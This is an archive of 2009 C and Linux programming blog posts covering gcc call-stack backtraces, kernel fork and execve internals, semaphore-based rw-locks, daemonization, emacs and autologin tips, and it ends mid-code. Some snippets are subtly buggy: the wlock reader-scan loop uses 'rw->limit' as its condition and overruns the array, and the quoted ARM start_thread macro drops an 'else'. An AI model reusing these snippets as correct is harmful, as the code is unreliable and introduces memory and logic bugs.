Tuesday, September 29, 2009

c/c++: call stack v.2

In previous c/c++: call stack article I wrote about obtaining function call stack. The method described in the article is good enough but it is linux-specific. There's no similar solutions out-of-box in other *nix-like operation systems as far as I know.
This time I would like to discuss more generic way. At list it is available for the code compiled with gcc.

gcc provides two built-in functions which could be used to obtain function call stack: __builtin_return_address and __builtin_frame_address. With __builtin_return_address it's possible to obtain return address of the current function, or of one of its callers. __builtin_frame_address returns the address of the function frame.

Both functions require constant argument - the number of frames to scan up.

To store function call struct call structure is used defined as following:

struct call {
 const void *address;
 const char *function;
 const char *object;
};

With __builtin_frame_address it is checked if the top of the stack has been reached - in this case aforementioned built-in returns zero. In the loop the return value of this function is compared with zero and the loop is terminated if this expression in compare statement turns into true - the top of the call stack has been reached.
Finally __builtin_return_address is used to get the return address of the function.

The resulting function to get the backtrace looks like:
#define _GNU_SOURCE
#include <dlfcn.h>

int backtrace(struct call trace[], int maxlen)
{
 Dl_info dlinfo;
 unsigned int i;

 for (i=0;i<maxlen;++i) {
  switch (i) {
   case 0:
    if(!__builtin_frame_address(0))
     return i;
    trace[i].address = __builtin_return_address(0);
    break;
   case 1:
    if(!__builtin_frame_address(1))
     return i;
    trace[i].address = __builtin_return_address(1);
    break;
   case 2:
    if(!__builtin_frame_address(2))
     return i;
    trace[i].address = __builtin_return_address(2);
    break;
 /* SNIP */
 /* .... */
 /* SNIP */
   case 63:
    if(!__builtin_frame_address(63))
     return i;
    trace[i].address = __builtin_return_address(63);
    break;
   default:
    return i;
  }

  if (dladdr(trace[i].address, &dlinfo) != 0) {
   trace[i].function = dlinfo.dli_sname;
   trace[i].object = dlinfo.dli_fname;
  }
 }

 return i;
}
backtrace routine fills trace array with the call stack information and returns the depth of the function calls.

Following small example shows backtrace in action:
#include <stdio.h>

#define CALLSTACK_MAXLEN 64

void f0()
{
 struct call trace[CALLSTACK_MAXLEN];
 int i;
 int depth;

 depth = backtrace(trace, CALLSTACK_MAXLEN);

 for (i=0;i<depth;++i)
  printf("%s: %s(%p)\n", trace[i].object, trace[i].function, trace[i].address);
}

void f1()
{
 f0();
}

void f2()
{
 f1();
}

void f3()
{
 f2();
}

void f4()
{
 f3();
}


int main(int argc, char **argv)
{
 f4();

 return 0;
}
Again the application should be compiled with -rdynamic gcc flag needed for dladdr function and linked with dl library for the same purpose:
gcc backtrace.c -o backtrace -ldl -rdynamic
After execution the program should provide the following output:
./backtrace 
./backtrace: f0(0x804b11c)
./backtrace: f1(0x804b1ac)
./backtrace: f2(0x804b1b9)
./backtrace: f3(0x804b1c6)
./backtrace: f4(0x804b1d3)
./backtrace: main(0x804b1e0)
/lib/libc.so.6: __libc_start_main(0x6ff58a9e)
Though it's gcc-specific method this compiler is available for most platforms and operation systems and is used almost everywhere as a default one.

Monday, September 21, 2009

c: double exclamation

Linux kernel is full of fascinating code. Not all of it is good but it's possible to find something interesting.
While reading the kernel code I've seen a lot of conditional expressions that contain double exclamations. Something like:

if (!!smth) {...}
I was curious what's the purpose of such expression.
And I've found that mostly this is used to make compiler happy and quite. Double exclamation or simply '!!' turns the expression value into binary representation: either '1' or '0'. Everything that could be treated as true results into '1' otherwise - '0'.
The simplest example to show it in action could be:
int i;

for (i = 0; i < 5; i++)
    printf("%d: %d\n", i, !!i);
This will print to the output:
0: 0
1: 1
2: 1
3: 1
4: 1
So, which compiler warnings this could help to suppress? That's very easy. Let's assume there's a function like following:
int function(void)
{                                                                                                     void *ptr;
    /* Useful calculations */
    return ptr;
}
The compiler, at least gcc, will warn that return expression makes integer from pointer without a cast. If function should return '1' on success and '0' on failure, double exclamation fits very well:
int function(void)
{                                                                                                     void *ptr;
    /* Useful calculations */
    return !!ptr;
}
Besides this simple example the double exclamation expression has indeed wide range of application.

Wednesday, July 22, 2009

linux: execution of the binary

In previous post I've touched internals of fork system call in Linux kernel.
Here I want to make the picture complete with describing execve system call.
execve is a system call that substitutes current process image with new one constructed from the executable binary. Usually execve supplements fork: with fork program creates new process and with execve it loads new image. This allows former continue to run in parallel with new program. In other case there was no opportunity to run different binaries at one time.
When userspace program calls one of the exec family defined by POSIX:

int execl(const char *path, const char *arg0, ... /*, (char *)0 */);
       int execv(const char *path, char *const argv[]);
       int execle(const char *path, const char *arg0, ... /*,
              (char *)0, char *const envp[]*/);
       int execve(const char *path, char *const argv[], char *const envp[]);
       int execlp(const char *file, const char *arg0, ... /*, (char *)0 */);
       int execvp(const char *file, char *const argv[]);
c library will finally execute execve system call:
int execve(const char *filename, char *const argv[], char *const envp[]);
execve system call will result into calling do_execve from fs/exec.c in the kernel mode.
At first do_execve checks if it's safe to execute this binary - checks process credentials. If it's safe to run the program do_execve opens the file and fills linux_binprm structure. This structure holds enough information needed to execute binary:
struct linux_binprm{
 ....
#ifdef CONFIG_MMU
 struct vm_area_struct *vma;
#else
# define MAX_ARG_PAGES 32
 struct page *page[MAX_ARG_PAGES];
#endif
 struct mm_struct *mm;
 unsigned long p;  /* current top of mem */
 ....
 struct file * file;
 struct cred *cred; /* new credentials */
 ....
 int argc, envc;
 char * filename; /* Name of binary as seen by procps */
 char * interp;  /* Name of the binary really executed. Most
       of the time same as filename, but could be
       different for binfmt_{misc,script} */
 ....
};
With int bprm_mm_init(struct linux_binprm *bprm) help new mm_struct is being initialized and, for example, for x86 arch new LTD(Local Descriptor Table) is being written. Architecture independent code allocates space for struct vm_area_struct and fills fields with appropriate values - area for the stack, etc. Worth to note that do_execve tries to migrate task to other processor on SMP system if balancing needed. do_execve is a good place to do load balancing task - the task has smallest memory and cache footprint.
When linux_binprm is filled with various values gathered from the current task and executable file metadata, do_execve tries to find proper handler with int search_binary_handler(struct linux_binprm *bprm, struct pt_regs *regs) which will finish setup of the new image. It iterates over all registered binary format handler until the suitable is found. In the loop load_binary callback from linux binary format handler is used to probe the image. If this callback finds the image suitable for this format handler the outer loop will stop the iteration.
load_binary is responsible not only for probing the image but also for loading it and setting up environment. It gets all needed information through the function arguments to do that.
load_binary in binary format handler is responsible for loading(mapping) image into memory and all stuff needed for the normal program execution(relocation, etc.), setting up stack, bss and environment: put argv and envp arrays onto userspace stack. Finally it calls start_thread which sets up process' registers with new values of stack pointer, program execution point, arguments for main function of the executable etc. Here how it looks for arm architecture:
#define start_thread(regs,pc,sp)                                \
 ({                                                             \
  unsigned long *stack = (unsigned long *)sp;                   \
  set_fs(USER_DS);                                              \
  memset(regs->uregs, 0, sizeof(regs->uregs));                  \
  if (current->personality & ADDR_LIMIT_32BIT)                  \
   regs->ARM_cpsr = USR_MODE;                                   \
   regs->ARM_cpsr = USR26_MODE;                                 \
  if (elf_hwcap & HWCAP_THUMB && pc & 1)                        \
   regs->ARM_cpsr |= PSR_T_BIT;                                 \
  regs->ARM_cpsr |= PSR_ENDSTATE;                               \
  regs->ARM_pc = pc & ~1;  /* pc */                             \
  regs->ARM_sp = sp;       /* sp */                             \
  regs->ARM_r2 = stack[2]; /* r2 (envp) */                      \
  regs->ARM_r1 = stack[1]; /* r1 (argv) */                      \
  regs->ARM_r0 = stack[0]; /* r0 (argc) */                      \
  nommu_start_thread(regs);                                     \
 })
In ARM architecture in assembly first four function parameters are being passed in registers r0-r3: argc, argv, envp pointers are written into r0, r1, r2 correspondingly.
Now current process is ready to run new program. Once the context switch is done for the process, usually by returning into the userland, new values of registers come into play and the code of new image is executing.

Monday, June 15, 2009

linux: creation of the new process

System developers know that you need fork system call to start a new process and execve system call to start a new program. While fork creates a copy of the current process(actually not a complete copy - please refer to the man page of fork to get information what is being duplicated and currently COW is used to postpone the copying of the memory regions), execve replaces current running process with a new executable binary.

Here I'll try to describe how the new process is being created in the kernel.

First of all the kernel has to handle a system call and switch from the userspace into the kernelspace. On different architectures this is done in different ways. On x86 it's most likely 0x80 software interrupt or swi instruction on ARM. The system call interface, SCI, demultiplexes the system call into the call of a routine in the kernel kingdom: gets the pointer of the routine in the syscall table.
fork system call is multiplexed into sys_fork kernel function. Its prototype is:

int sys_fork(struct pt_regs *regs)
. This is a arch-dependent routine. struct pt_regs is a set of CPU registers which are saved in the process' memory region. When userspace makes a system call CPU registers of current process are taken. Arch-dependent sys_fork makes initial checks(for example it returns -EINVAL on ARM without MMU) and finally calls system-independent do_fork:
long do_fork(unsigned long clone_flags,
       unsigned long stack_start,
       struct pt_regs *regs,
       unsigned long stack_size,
       int __user *parent_tidptr,
       int __user *child_tidptr)
clone_flags represent policy of what should be copied and what should be shared between the process that called sys_fork(parent process) and newly created process(child process). stack_start and stack_size point to the start of the stack and its size respectively. These values are taken from the information obtained about the current process. regs is a pointer to CPU registers of the current process. This structure represents the state of the CPU registers. For x86 it's defined as
struct pt_regs {
 long ebx;
 long ecx;
 long edx;
 long esi;
 long edi;
 long ebp;
 long eax;
 int  xds;
 int  xes;
 int  xfs;
 long orig_eax;
 long eip;
 int  xcs;
 long eflags;
 long esp;
 int  xss;
};
and for ARM as
struct pt_regs {
 long uregs[18];
};

#define ARM_cpsr uregs[16]
#define ARM_pc  uregs[15]
#define ARM_lr  uregs[14]
#define ARM_sp  uregs[13]
#define ARM_ip  uregs[12]
#define ARM_fp  uregs[11]
#define ARM_r10  uregs[10]
#define ARM_r9  uregs[9]
#define ARM_r8  uregs[8]
#define ARM_r7  uregs[7]
#define ARM_r6  uregs[6]
#define ARM_r5  uregs[5]
#define ARM_r4  uregs[4]
#define ARM_r3  uregs[3]
#define ARM_r2  uregs[2]
#define ARM_r1  uregs[1]
#define ARM_r0  uregs[0]
#define ARM_ORIG_r0 uregs[17]
parent_tidptr and child_tidptr are pointers which help userspace libraries to handle threads(NPTL respectively).
do_fork again does some checks and calls copy_process which is responsible for make a copy of the process. copy_process again does some checks of supplied flags and does the copying of the process:
* duplicates task structure;
* allocates memory for kernel stack and puts instance of struct thread_info on the bottom of the kernel stack which holds arch-specific information about the process;
* copies process information: fs, opened files, IPC, signal handling, mm, etc.;
* generates new PID and other IDs in respect of namespace information;
* does some further actions according to passed flags.
Interesting how memory copying is managed by copy_process. mm structure described by struct mm_struct is being copied by copy_mm function. If CLONE_VM was supplied it doesn't copy the memory management information of the parent process but shares it with child and adjusts reference counter of the users of this mm. If no CLONE_VM was set dup_mm is called. This function makes a copy of the mm struct but doesn't copy the contents of the memory pages - copy-on-write is used to make this process run faster and do not waste system memory. When either parent or child process attempts to write to the memory page page fault occurs and kernel recognizes that the page should be copied for each process and write operation could be later satisfied: the result of this operation would be visible only for initiator.
Another interesting function called by copy_process is copy_thread. This routine is architecture dependent and in general among other management tasks it copies CPU registers of current process to the new process and adjusts some of their values(stack pointer, etc.). Also it sets pc(for ARM)/ip(for x86) to ret_from_fork. ret_from_fork will be called next time the newly created process will be scheduled to run. This function does some cleanups and returns control to the userspace. Linux saves CPU registers in the top of the kernel stack of the process. This information helps kernel to do a context switch.
When the process is ready to run do_fork calls wake_up_new_task(or sets TASK_STOPPED if process is being traced) which informs process scheduler that task is ready.
At this point kernel returns execution point into the userland.

Tuesday, May 5, 2009

*nix: crash-safe rw-lock with semaphores

In previous post about rw-locks based on semaphores I've introduced rw-lock mechanism to limit readers.
This post introduces crash-safe implementation of rw-locks. The implemlementation doesn't take into account bad application design. It doesn't detect deadlocks however this is not hard to implement when you get the main idea.
The implementation tracks readers and writers and can detect whether reader/writer that currently blocks the queue is alive and tries to improve the whole situation.
The threads are not taken into account because if thread crashes due to some unpredicted reason most likely the process that created it will die too. If thread exits without releasing the lock this is not a crash - it's poor application design. Safiness of such behaviors is another topic I believe.

In the real world you may get some situation when you want some safiness with locking the section and the code of this section might fail because of the outer world influence(unhandled signal, OOM-killer) and interior ifluence(the code of section might cause segfault).

To behonest most of the time I don't believe the code I'm protecting and that the outer world is kind for me. The code might cause crash deeply inside the function calls and the OOM killer might chose the application as victim.
Knowing all these I want the whole application continue to run.
The implemetation of crash-safe rw-locks is listed below. Well, it's a bit linux-specific(in the mmap call) but this is just for simplicity. I didn't want to overload the code to make it cross-platform.

#include <semaphore.h>
#include <sys/mman.h>
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>
#include <time.h>
#include <string.h>

struct rw_lock *rw;

struct rw_lock {
 sem_t wbl;
 sem_t rbl;
 sem_t r;
 sem_t w;
 int limit;
 pid_t writer;
 pid_t *readers;
};

void init_rwlock(struct rw_lock **rw, int limit)
{
 *rw = mmap(NULL, sizeof(struct rw_lock), PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANONYMOUS, 0, 0);

 sem_init(&(*rw)->r, 1, limit);
 sem_init(&(*rw)->w, 1, 1);
 sem_init(&(*rw)->wbl, 1, 1);
 sem_init(&(*rw)->rbl, 1, 1);
 (*rw)->limit = limit;
 (*rw)->writer = 0;
 (*rw)->readers = mmap(NULL, sizeof(pid_t)*limit, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANONYMOUS, 0, 0);
}

void rlock(struct rw_lock *rw)
{
 int i;
 struct timespec to = {
  .tv_sec = 1,
  .tv_nsec = 0
 };

 sem_wait(&rw->w);

 do {
  if (sem_timedwait(&rw->r, &to) == 0) {
   break;
  } else if (errno == ETIMEDOUT) {
   sem_wait(&rw->rbl);
   for (i=0;i<rw->limit;++i)
    if (rw->readers[i] && kill(rw->readers[i], 0) == -1 && errno == ESRCH) {
     printf("deadlock detected: process invoked rlock died(%d)\n", rw->readers[i]), fflush(NULL);
     rw->readers[i] = 0;
     sem_post(&rw->r);

     break;
    }
   sem_post(&rw->rbl);
  }
 } while (1);

 sem_wait(&rw->rbl);
 for (i=0;i<rw->limit;++i)
  if (rw->readers[i] == 0) {
   rw->readers[i] = getpid();

   break;
  }
 sem_post(&rw->rbl);

 sem_post(&rw->w);
}

void runlock(struct rw_lock *rw)
{
 int i, current = getpid();

 sem_wait(&rw->rbl);
 for (i=0;i<rw->limit;++i)
  if (rw->readers[i] == current) {
   rw->readers[i] = 0;

   break;
  }
 sem_post(&rw->rbl);

 sem_post(&rw->r);
}

void wlock(struct rw_lock *rw)
{
 int val;
 pid_t current = getpid();
 struct timespec to = {
  .tv_sec = 1,
  .tv_nsec = 0
 };
 time_t wfr0, wfr1;

 do {
  if (sem_timedwait(&rw->w, &to) == 0) {
   break;
  } else if (errno == ETIMEDOUT) {
   sem_wait(&rw->wbl);
   if (rw->writer && kill(rw->writer, 0) == -1 && errno == ESRCH) {
    printf("deadlock detected: process invoked wlock died(%d)\n", rw->writer), fflush(NULL);
    rw->writer = 0;
    sem_post(&rw->w);
   }
   sem_post(&rw->wbl);
  }
 } while (1);
 sem_wait(&rw->wbl);
 rw->writer = current;
 sem_post(&rw->wbl);

 wfr0 = time(NULL);
 do {
  wfr1 = time(NULL);
  if ((wfr1 - wfr0) > 1) {
   int i;
   sem_wait(&rw->rbl);
   for (i=0;rw->limit;++i)
    if (rw->readers[i] && kill(rw->readers[i], 0) == -1 && errno == ESRCH) {
     printf("deadlock detected: process invoked rlock died(%d)\n", rw->readers[i]), fflush(NULL);
     rw->readers[i] = 0;
     sem_post(&rw->r);

     break;
    }
   sem_post(&rw->rbl);
   wfr0 = wfr1;
  }

  sem_getvalue(&rw->r, &val);

 } while (val != rw->limit);
}

void wunlock(struct rw_lock *rw)
{
 sem_wait(&rw->wbl);
 rw->writer = 0;
 sem_post(&rw->wbl);

 sem_post(&rw->w);
}
The idea is simple. If the process unable to lock the section for some time it checks whether the previos holder is alive. Otherwise the process tries to release the semaphore and accuire it again. It's possible to omit release/accuire procedure and just change the holder. You'll gain some performance with this change. I left this just to make the code more clear.

The application that simulates crashes is shown below:
int *counter;

void reader(void)
{
 while (1) {
  rlock(rw);
  if (*counter == 1024*4) {
   runlock(rw);
   break;
  }
  if (*counter !=0 && *counter%1024 == 0) {
   printf("reader died(counter: %d, pid: %d)\n", *counter,getpid()), fflush(NULL);
   *(int *)0 = 0;
  }
  runlock(rw);
 }
}

void writer(void)
{
 while (1) {
  wlock(rw);
  if (*counter == 2048*2) {
   wunlock(rw);
   break;
  }
  ++*counter;
  if (*counter !=0 && *counter%2048 == 0) {
   printf("writer died(counter: %d, pid: %d)\n", *counter, getpid()), fflush(NULL);
   *(int *)0 = 0;
  }
  wunlock(rw);
 }
}
int main(int argc, char **argv)
{
 int i;

 counter = mmap(NULL, sizeof(int), PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANONYMOUS, 0, 0);

 init_rwlock(&rw, 5);

 for (i=0;i<10;++i)
  if (fork() == 0) {
   reader();

   return 0;
  }

 for (i=0;i<5;++i)
  if (fork() == 0) {
   writer();

   return 0;
  }

 for (i=0;i<15;++i)
  wait(NULL);

 printf("counter: %d\n", *counter);

 return 0;
}
After running this application you'll find the information about the crashed processes in dmesg:
*sudo dmesg -c
test[8806]: segfault at 0 ip 08048d5e sp bf828290 error 6 in test[8048000+2000]
test[8812]: segfault at 0 ip 08048e01 sp bf828290 error 6 in test[8048000+2000]
test[8801]: segfault at 0 ip 08048d5e sp bf828290 error 6 in test[8048000+2000]
test[8804]: segfault at 0 ip 08048d5e sp bf828290 error 6 in test[8048000+2000]
test[8808]: segfault at 0 ip 08048d5e sp bf828290 error 6 in test[8048000+2000]
test[8799]: segfault at 0 ip 08048d5e sp bf828290 error 6 in test[8048000+2000]
test[8800]: segfault at 0 ip 08048d5e sp bf828290 error 6 in test[8048000+2000]
test[8802]: segfault at 0 ip 08048d5e sp bf828290 error 6 in test[8048000+2000]
test[8805]: segfault at 0 ip 08048d5e sp bf828290 error 6 in test[8048000+2000]
test[8809]: segfault at 0 ip 08048e01 sp bf828290 error 6 in test[8048000+2000]
And the application should produce following output:
reader died(counter: 1024, pid: 8806)
deadlock detected: process invoked rlock died(8806)
writer died(counter: 2048, pid: 8812)
deadlock detected: process invoked wlock died(8812)
reader died(counter: 2048, pid: 8801)
reader died(counter: 2048, pid: 8804)
reader died(counter: 2048, pid: 8808)
reader died(counter: 2048, pid: 8799)
reader died(counter: 2048, pid: 8802)
deadlock detected: process invoked rlock died(8801)
reader died(counter: 2048, pid: 8800)
deadlock detected: process invoked rlock died(8800)
reader died(counter: 2048, pid: 8805)
deadlock detected: process invoked rlock died(8805)
deadlock detected: process invoked rlock died(8804)
deadlock detected: process invoked rlock died(8808)
deadlock detected: process invoked rlock died(8799)
deadlock detected: process invoked rlock died(8802)
writer died(counter: 4096, pid: 8809)
deadlock detected: process invoked wlock died(8809)
counter: 4096, max_readers: 5
As you can see there are few readers crashed in the same circumstances just because they were allowed to do so.

Tuesday, April 21, 2009

linux: how to become a real daemon?

When you want to write a daemon - a program that runs in background and serves during all the time that machine run(or almost all the time) you there are few things that's better to remember.

First of all the daemon should release controlling terminal. If daemon holds controlling terminal SIGHUP is sent when controlling terminal is lost. This happens if CLOCAL flag on the terminal is not set. That's not a good idea to handle these signals as a workaround to keep process running if controlling terminal is lost.
In linux(and maybe in some other OSes) lately CLOCAL is usually set but the developer shouldn't rely on this.

There are few ways to detach from the controlling terminal.
The easy way is to request TIOCNOTTY from the tty device if it supports it:

int tty = open("/dev/tty", O_RDWR);
if (tty == -1)
    return -1;

if (ioctl(tty, TIOCNOTTY, (char *)0) == -1)
    return -1;

close(tty);
This might not work for in some OSes. There is another opportunity.
Daemon has to create a new session using setsid. The caller of setsid becomes a process leader without controlling terminal. There is one thing with setsid - it creates a new session if caller is not a process group leader.
To do so first of all the daemon should call setsid from its child. The child will become a process leader and will get closer to be a real daemon and the parent will exit taking controlling tty with itself:
#include <unistd.h>

int main(int argc, char **argv)
{
 if (fork() == 0) {
  setsid();
  while (1) {
   /* Daemons like to sleep */
   sleep(1);
  }
 }

 return 0;
}
Next thing is to release current working directory. It's not good if daemon starts in some directory that is placed on filesystem that might be unmounted during the daemon's work. You won't be able to unmount the filesystem in that case. Simply chdir to '/' is a good choice.
Also it'd be nice to close stdin/stdout/stderr file descriptors since the daemon doesn't need them and some system resources could be saved. If the daemon is going to produce some output that's bad idea to use inherited stdout and stderr since you don't know where they might be redirected. It's better to provide new open descriptors(stdout and/or stderr might point to some log file):
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>

int main(int argc, char **argv)
{
 if (fork() == 0) {
  int log;

  setsid();

  log = open("/tmp/test.log", O_CREAT|O_APPEND|O_RDWR, 0755);
  close(0);
  close(2);
  dup2(log, 1);

  printf("Daemon is started\n");
  while (1) {
   /* Daemons like to sleep */
   sleep(1);
   printf("Daemon is sleeping\n");
   fflush(NULL);
  }
 }

 return 0;
}
The output will go to "/tmp/test.log":
*./test 
*tail /tmp/test.log -f
Daemon is started
Daemon is sleeping
Daemon is sleeping
Daemon is sleeping
Daemon is sleeping
Daemon is sleeping

Tuesday, April 14, 2009

emacs: proper kill-whole-line

I'm using emacs not for a long time but I really liked it. It took not much time to get used to it. Though emacs doesn't have some function you are free to write them in elisp easily!
I used to vim's 'dd' command which kills current line and later you are able to yank it.
emacs has 'kill-line' function to kill line from the current point except newline character or 'kill-whole-line' which kills following newline also. This doesn't fit me entirely. I would like to kill the whole line from the beginning including newline character. Simply you can wrap 'kill-whole-line' with adding an instruction to jump into the beginning of the line and finally kill it.
Looks like everything is done except the situation when you want to yank it back. When you'll try to yank the killed line you'll see that besides wanted line you have an extra newline. It was annoying for me to yank and kill the appendix. Finally I wrote my variant of 'kill-whole-line' - kill-total-line:

(defun kill-total-line ()
  (interactive)
  (let ((kill-whole-line t)) 
        (beginning-of-line)
        (kill-line)
        (setq top (car kill-ring))
        (setq last (substring top -1))
        (if (string-equal last "\n")
                (let ()
                  (setq stripped (substring top 0 -1))
                  (setq kill-ring (cons stripped (cdr kill-ring)))
                  )
          )
        )
  )
This 'kill-total-line' function kills the line from the beginning to the end and cuts newline symbol of the killed line in the kill-ring if any. Now I'm happy to kill lines and yank them back!

Tuesday, April 7, 2009

c: offset of the member in struct

Sometimes, very rarely, you know the pointer to the member of the structure and the type of the structure it belongs to. And in this rare situation you want to get pointer to the entire structure.

To get the pointer of the original structure you should know the offset of this member in the structure. The hint here is that you can use some base address(0 fits the best here), cast it into the pointer of the structure type, dereference with given member name and voilà - you have the offset. Look at the next code snippet:

struct S {
 int m0;
 char m1;
 short m2;
 long m3;
};
unsigned int m3_offset = (unsigned int)(&((struct S *)0)->m3);
Variable m3_offset holds the offset of the member m3 in structure S. In this case the offset of m3 is equal 8. So the address of the variable of type S is (address of m3) - m3_offset.
struct S *sp = (struct S *)((char *)&s.m3 - m3_offset);
You should cast pointer to member into char * to correctly use pointer arithmetics.
The whole code that shows this trick is below:
#include <stdio.h>

struct S {
 int m0;
 char m1;
 short m2;
 long m3;
};

unsigned int m3_offset = (unsigned int)(&((struct S *)0)->m3);

int main(int argc, char **argv)
{
 struct S s = {1, 2, 3, 4};
 struct S *sp = (struct S *)((char *)&s.m3 - m3_offset);

 printf("m1: %d\n", sp->m1);

 return 0;
}
The output should be
*./test 
m1: 2
This technique could be used to easily construct nested structures:
struct S0 {
 int s0m0;
};

struct S1 {
 struct S0 s1m0;
 int s1m1;
};

/**
 * pointer to member in S structure
 * type of S
 * name of member
 */
#define S(s, st, m)            \
 ({               \
  unsigned int offset = (unsigned int)(&((st *)0)->m); \
  (st *)((char *)s-offset);        \
 })

int main(int argc, char **argv)
{
 struct S1 s = {{1}, 2};

 printf("%d",S(&s.s1m0, struct S1, s1m0)->s1m1);

 return 0;
}
It's easy to build such data types as trees, queues and so on separately defining payload structures(data of the node) and helper structures(pointers to other nodes, etc.)
Doubly ended queue in linux kernel uses this approach and looking into the code you can definitely say - the code looks much clear if this technique is used.

Tuesday, March 31, 2009

linux: semget across the processes

Recently I've written an issue on whether the semaphore handle obtained with sem_open is valid in children processes.
To make the picture complete I'd like to describe is it possible to pass semaphore handle to children processes obtained by IXS's semget.

When you call semget with some key and the call was successful you get semaphore id that is valid not only within process tree but system wide.
So actually there shouldn't be any problems with the children processes that are using semaphore handle obtained in the parent process. Let's glance at the code below.

#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/sem.h>
#include <errno.h>
#include <string.h>

union semun
{
 int              val;    /* Value for SETVAL */
 struct semid_ds *buf;    /* Buffer for IPC_STAT, IPC_SET */
 unsigned short  *array;  /* Array for GETALL, SETALL */
};

int main()
{
 struct sembuf op[1];
 union semun ctrl;
 int sem = semget(0xF00B00, 1, IPC_CREAT|0600);
 if (sem == -1)
 {
  perror("semget");

  return 1;
 }

 op[0].sem_num = 0;
 op[0].sem_flg = 0;

 ctrl.val = 1;
 if (semctl(sem, 0, SETVAL, ctrl) == -1)
 {
  perror("semctl");

  return 1;
 }

 switch(fork())
 {
  case -1:
   perror("fork()");

   return 1;

  case 0:
  {
   printf("Child %u waiting for semaphore(%d)...\n",getpid(), sem);
   op[0].sem_op = 0;
   semop(sem, op, 1);
   printf("Child: Done\n");

   return 0;
  }
 }

 sleep(1);

 printf("Parent %u setting semaphore(%d)...\n",getpid(),sem);
 op[0].sem_op = -1;
 semop(sem, op, 1);
 printf("Parent: Set\n");

 return 0;
}
Here a semaphore was created and its initial value was 1. Next child process was created which waits on the semaphore until its value becomes zero. It finishes as soon as parent process decrements the value of the semaphore.The output of this test application would be
$ ./test 
Child 3353 waiting for semaphore(0)...
Parent 3352 setting semaphore(0)...
Child: Done
Parent: Set
With ipcs we can look at the system semaphores:
$ ipcs -s

------ Semaphore Arrays --------
key        semid      owner      perms      nsems     
0x00f00b00 0          niam      600        1 
You can see that semaphore with key 0x00f00b00 and id 0 is present in the system.
Since semaphore is system wide and could be accessed by its id the call to sem get may be omitted is we know that semaphore is already available and the id is known. The following code snippet is the same as previous one except there's no call to semget but value of sem is hardcoded with value 0(the id of that semaphore in our case):
int main()
{
 struct sembuf op[1];
 union semun ctrl;
 int sem = 0;

 op[0].sem_num = 0;
 op[0].sem_flg = 0;

 ctrl.val = 1;
 if (semctl(sem, 0, SETVAL, ctrl) == -1)
 {
  perror("semctl");

  return 1;
 }

 switch(fork())
 {
  case -1:
   perror("fork()");

   return 1;

  case 0:
  {
   printf("Child %u waiting for semaphore(%d)...\n",getpid(), sem);
   op[0].sem_op = 0;
   semop(sem, op, 1);
   printf("Child: Done\n");

   return 0;
  }
 }

 sleep(1);

 printf("Parent %u setting semaphore(%d)...\n",getpid(),sem);
 op[0].sem_op = -1;
 semop(sem, op, 1);
 printf("Parent: Set\n");

 return 0;
}
The output is
$ ./test 
Child 3366 waiting for semaphore(0)...
Parent 3365 setting semaphore(0)...
Child: Done
Parent: Set
Here as before the child process waits for the semaphore until the parent process decrements its value to become 0.

If you'll look into the code of semget you'll find that it does semget syscall. In ipc/util.c in the linux kernel tree you should be able to find ipcget function which calls ipcget_public routine that makes key checks and in under certain circumstances creates new semaphore with new id and adds to semaphore set. The value of id is system wide, so after the semaphore had been created you will be able to get access to it if you have appropriate permissions.

Friday, March 27, 2009

linux: automatic login

The time of laptop-per-human is almost came. Laptop is something personal like toothbrush - you are the only owner.
I do not really worry who is using laptop - because only I use it. So logging in each time I plug power on seemed strange for me. So I've forced gdm(gnome desktop manager) to autologin mode. The time passed and I realized that the only purpose of gdm is to automatically login to my session. "What the hell?" I said to myself. Why do I have to spend my laptop's resource on something that I don't really need(yep, I prefer to spend memory and cpu on emacs and gcc)?

So I've found nice approach to autologin to X session w/o any desktop managers.
That's really simple.
You should edit /etc/inittab configuration file and replace line which loads desktop manager with command that will launch X session for your user. For me it is

x:5:once:/bin/su <user> -l -c "/bin/bash --login -c 'ck-launch-session startx' &>/dev/null"

For distributions that use another approach to run DM(like gentoo - they load DM as a startup script) you can replace the line which loads DM with
/bin/su <user> -l -c "/bin/bash --login -c 'ck-launch-session startx' &>/dev/null"
or disable loading the startup script and modify inittab like I showed above.

Also it's possible to make automatic login in virtual consoles:
c1:2345:respawn:/sbin/mingetty -n -l <user> vc/1 linux
or
c1:2345:respawn:/sbin/agetty -n -l <external program> 38400 vc/1 linux
Whe external program will perform login for you. The program might be quite simple - just exec 'login' for your user.

Tuesday, March 24, 2009

*nix: rw-lock with semaphores

RW-lock is widely used synchronization technique. It allows multiply readers to go through the barrier if there is no writers and only one writer at one time.
This incredibly could speed up application if you expect more readers than writers and amount of readers is high(here should be some heuristic because if you have few readers and time of data lock in reader is small using rw-locks might be overhead).

You likely will find rw-lock mechanism in POSIX threads(pthread_rwlock_init, pthread_rwlock_rdlock, pthread_rwlock_wrlock, pthread_rwlock_unlock). As pthreads is a POSIX interface you will likely find it on any POSIX-compliant system.

When we are talking about process synchronization we'll more likely think about semaphores.
There is no such thing as rw-lock semaphore(some system have indeed).
Of course you still may set PTHREAD_PROCESS_SHARED on pthread rw-lock with pthread_rwlockattr_setpshared. But if you still want to use semaphores ...

Keeping in mind that rw-lock is operated by two types of tasks two semaphores are needed. One for writer. It will be binary semaphore. And one for readers. It will be counting semaphore.

When the reader tries to get the lock it checks if there is no writers. If nobody is writing, the reader increments counting semaphore and proceeds. On 'unlock' the reader just decrement the counting semaphore and that's all.
When the writer tries to 'lock' it takes(decrements) binary semaphore and wait until all readers finish their work. When there's no readers the writer proceeds. On 'unlock' the writer releases(increments) binary semaphore.

Look at the implementation below:

#include <semaphore.h>
#include <errno.h>

struct rwlock {
    sem_t rlock;
    sem_t wlock;
};

void init_rwlock(struct rwlock *rw);
void destroy_rwlock(struct rwlock *rw);
void rlock(struct rwlock *rw);
void runlock(struct rwlock *rw);
void wlock(struct rwlock *rw);
void wunlock(struct rwlock *rw);

void init_rwlock(struct rwlock *rw)
{
    sem_init(&rw->rlock, 1, 0);
    sem_init(&rw->wlock, 1, 1);
}

void destroy_rwlock(struct rwlock *rw)
{
    wlock(rw);

    sem_destroy(&rw->rlock);
    sem_destroy(&rw->wlock);
}

void rlock(struct rwlock *rw)
{
    sem_wait(&rw->wlock);

    sem_post(&rw->rlock);

